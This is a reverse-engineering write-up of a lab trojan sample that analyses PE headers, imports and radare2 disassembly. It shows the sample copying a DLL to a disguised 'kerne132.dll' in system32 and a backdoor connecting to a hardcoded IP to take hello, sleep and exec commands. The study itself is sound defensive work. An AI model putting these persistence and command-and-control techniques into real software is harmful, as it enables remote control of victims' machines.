Name: Trojan:Win32/Aenjaris.CT!bit
rabin2 -H lab1.exe
...
IMAGE_FILE_HEADERS
Machine : 0x14c
NumberOfSections : 0x3
TimeDateStamp : 0x4d0e2fd3 <-------
PointerToSymbolTable : 0x0
NumberOfSymbols : 0x0
SizeOfOptionalHeader : 0xe0
Characteristics : 0x10f
...hex mode compilation date: 0x4d0e2fd3 decoding:
>>>from datetime import datetime
>>>datetime.fromtimestamp(int('0x4d0e2fd3', 16))
datetime.datetime(2010, 12, 19, 17, 16, 19)Result: 2010-12-19 16:16:19
Notes:
- Linux tool for PE: https://github.com/horsicq/Detect-It-Easy
- Windows tool for PE: PEiD Output:
Compiled and linked with MS VC++ 6.0
Result: no obfuscation
r2 lab1.exe
>>>aaa
>>>ii
[Imports]
1 0x00402000 NONE FUNC KERNEL32.dll_CloseHandle
2 0x00402004 NONE FUNC KERNEL32.dll_UnmapViewOfFile
3 0x00402008 NONE FUNC KERNEL32.dll_IsBadReadPtr
4 0x0040200c NONE FUNC KERNEL32.dll_MapViewOfFile
5 0x00402010 NONE FUNC KERNEL32.dll_CreateFileMappingA
6 0x00402014 NONE FUNC KERNEL32.dll_CreateFileA
7 0x00402018 NONE FUNC KERNEL32.dll_FindClose
8 0x0040201c NONE FUNC KERNEL32.dll_FindNextFileA
9 0x00402020 NONE FUNC KERNEL32.dll_FindFirstFileA
10 0x00402024 NONE FUNC KERNEL32.dll_CopyFileA
1 0x0040202c NONE FUNC MSVCRT.dll_malloc
2 0x00402030 NONE FUNC MSVCRT.dll_exit
3 0x00402034 NONE FUNC MSVCRT.dll__exit
4 0x00402038 NONE FUNC MSVCRT.dll__XcptFilter
5 0x0040203c NONE FUNC MSVCRT.dll___p___initenv
6 0x00402040 NONE FUNC MSVCRT.dll___getmainargs
7 0x00402044 NONE FUNC MSVCRT.dll__initterm
8 0x00402048 NONE FUNC MSVCRT.dll___setusermatherr
9 0x0040204c NONE FUNC MSVCRT.dll__adjust_fdiv
10 0x00402050 NONE FUNC MSVCRT.dll___p__commode
11 0x00402054 NONE FUNC MSVCRT.dll___p__fmode
12 0x00402058 NONE FUNC MSVCRT.dll___set_app_type
13 0x0040205c NONE FUNC MSVCRT.dll__except_handler3
14 0x00402060 NONE FUNC MSVCRT.dll__controlfp
15 0x00402064 NONE FUNC MSVCRT.dll__stricmp
Analysis
Functions: CreateFileMappingA, CreateFileA, FindClose, FindNextFileA, FindFirstFileA, CopyFileA - are looking like self-replication (trojan malware)
After checking entry/main function we can see an addition function 0x00401440 sub.WARNING_THIS_WILL_DESTROY_YOUR_MACHINE_440
we can find dll usage in this function
pdf @0x00401440
...
| || 0x004014d6 6a00 push 0
| || 0x004014d8 6a00 push 0
| || 0x004014da 6a03 push 3 ; 3
| || 0x004014dc 6a00 push 0
| || 0x004014de 6a01 push 1 ; 1
| || 0x004014e0 8bf0 mov esi, eax
| || 0x004014e2 6800000010 push 0x10000000
| || 0x004014e7 687c304000 push str.Lab01_01.dll ; 0x40307c ; "Lab01-01.dll"
| || 0x004014ec 89742474 mov dword [local_74h], esi
| || 0x004014f0 ffd7 call edi
...In addition the tool will try to copy malware dll to the system32 dir:
| || 0x004017e8 6a00 push 0
| || 0x004017ea 684c304000 push str.C:__windows__system32__kerne132.dll ; 0x40304c ; "C:\\windows\\system32\\kerne132.dll"
| || 0x004017ef 687c304000 push str.Lab01_01.dll ; 0x40307c ; "Lab01-01.dll"
| || 0x004017f4 ff1524204000 call dword [sym.imp.KERNEL32.dll_CopyFileA] ; 0x402024
Target file is C:\\windows\\system32\\kerne132.dll
Checking target lab1.dll with r2
r2 lab1.dll
>>>aaa
>>>afl
0x10001010 19 490 sub.SADFHUHF_10
0x10001220 3 47 fcn.10001220
0x1000124f 17 171 sub.MSVCRT.dll__adjust_fdiv_24f
0x100012fa 21 157 entry0
0x10001398 1 6 sub.MSVCRT.dll__initterm_398There is a function sub.SADFHUHF_10 - it performs some network activity:
pdf @0x10001010
...
| ||| 0x1000108c 6a06 push 6 ; 6
| ||| 0x1000108e 6a01 push 1 ; 1
| ||| 0x10001090 6a02 push 2 ; 2
| ||| 0x10001092 ff1530200010 call dword [sym.imp.WS2_32.dll_socket] ; 0x10002030
| ||| 0x10001098 8bf0 mov esi, eax
| ||| 0x1000109a 83feff cmp esi, 0xff ; 255
| ,====< 0x1000109d 0f843f010000 je 0x100011e2
| |||| 0x100010a3 6828600210 push str.127.26.152.13 ; 0x10026028 ; "127.26.152.13"
| |||| 0x100010a8 66c744241802. mov word [esp + 0x18], 2
| |||| 0x100010af ff1538200010 call dword [sym.imp.WS2_32.dll_inet_addr] ; 0x10002038
| |||| 0x100010b5 6a50 push 0x50 ; 'P' ; 80
| |||| 0x100010b7 8944241c mov dword [esp + 0x1c], eax
| |||| 0x100010bb ff1554200010 call dword [sym.imp.WS2_32.dll_htons] ; 0x10002054 ; "\t"
| |||| 0x100010c1 8d542414 lea edx, dword [esp + 0x14] ; 20
| |||| 0x100010c5 6a10 push 0x10 ; 16
| |||| 0x100010c7 52 push edx
| |||| 0x100010c8 56 push esi
| |||| 0x100010c9 6689442422 mov word [esp + 0x22], ax
| |||| 0x100010ce ff153c200010 call dword [sym.imp.WS2_32.dll_connect] ; 0x1000203c
| |||| 0x100010d4 83f8ff cmp eax, 0xff ; 255
| ,=====< 0x100010d7 0f84fe000000 je 0x100011db
...Here we can see spcket creation for hardcoded ip address: 127.26.152.13
After that we can see some "commands" handling like: hello, sleep, exec
| ::||||| 0x100010fb 6820600210 push str.hello ; 0x10026020 ; "hello"
| ::||||| 0x10001100 56 push esi
| ::||||| 0x10001101 ff1540200010 call dword [sym.imp.WS2_32.dll_send] ; 0x10002040
| ::||||| 0x10001107 83f8ff cmp eax, 0xff ; 255
| ========< 0x1000110a 0f84cb000000 je 0x100011db
| ::||||| 0x10001110 6a01 push 1 ; 1
| ::||||| 0x10001112 56 push esi
| ::||||| 0x10001113 ff1544200010 call dword [sym.imp.WS2_32.dll_shutdown] ; 0x10002044
| ::||||| 0x10001119 83f8ff cmp eax, 0xff ; 255
| ========< 0x1000111c 0f84b9000000 je 0x100011db
| ::||||| 0x10001122 6a00 push 0
| ::||||| 0x10001124 8d84240c0200. lea eax, dword [esp + 0x20c] ; 524
| ::||||| 0x1000112b 6800100000 push 0x1000
| ::||||| 0x10001130 50 push eax
| ::||||| 0x10001131 56 push esi
| ::||||| 0x10001132 ff1548200010 call dword [sym.imp.WS2_32.dll_recv] ; 0x10002048
| ::||||| 0x10001138 85c0 test eax, eax
| ========< 0x1000113a 7ead jle 0x100010e9
| ::||||| 0x1000113c 8d8c24080200. lea ecx, dword [esp + 0x208] ; 520
| ::||||| 0x10001143 6a05 push 5 ; 5
| ::||||| 0x10001145 51 push ecx
| ::||||| 0x10001146 6818600210 push str.sleep ; 0x10026018 ; "sleep"
| ::||||| 0x1000114b ffd5 call ebp
| ::||||| 0x1000114d 83c40c add esp, 0xc
| ::||||| 0x10001150 85c0 test eax, eax
| ========< 0x10001152 750d jne 0x10001161
| ::||||| 0x10001154 6800000600 push 0x60000
| ::||||| 0x10001159 ff1500200010 call dword [sym.imp.KERNEL32.dll_Sleep] ; 0x10002000
| ========< 0x1000115f eb88 jmp 0x100010e9
| ::||||| ; JMP XREF from 0x10001152 (sub.SADFHUHF_10)
| --------> 0x10001161 8d9424080200. lea edx, dword [esp + 0x208] ; 520
| ::||||| 0x10001168 6a04 push 4 ; 4
| ::||||| 0x1000116a 52 push edx
| ::||||| 0x1000116b 6810600210 push str.exec ; 0x10026010 ; "exec"
| ::||||| 0x10001170 ffd5 call ebp
| ::||||| 0x10001172 83c40c add esp, 0xc
| ::||||| 0x10001175 85c0 test eax, eax
| ========< 0x10001177 753d jne 0x100011b6
- This is a trojan/spy software
- It will try to load the dll and run a few functions from it
- Internally it will create a connection to
127.26.152.13 - It will perform some additional actions based on commands from "master" node
- This tool can run additional code/commands on infected machine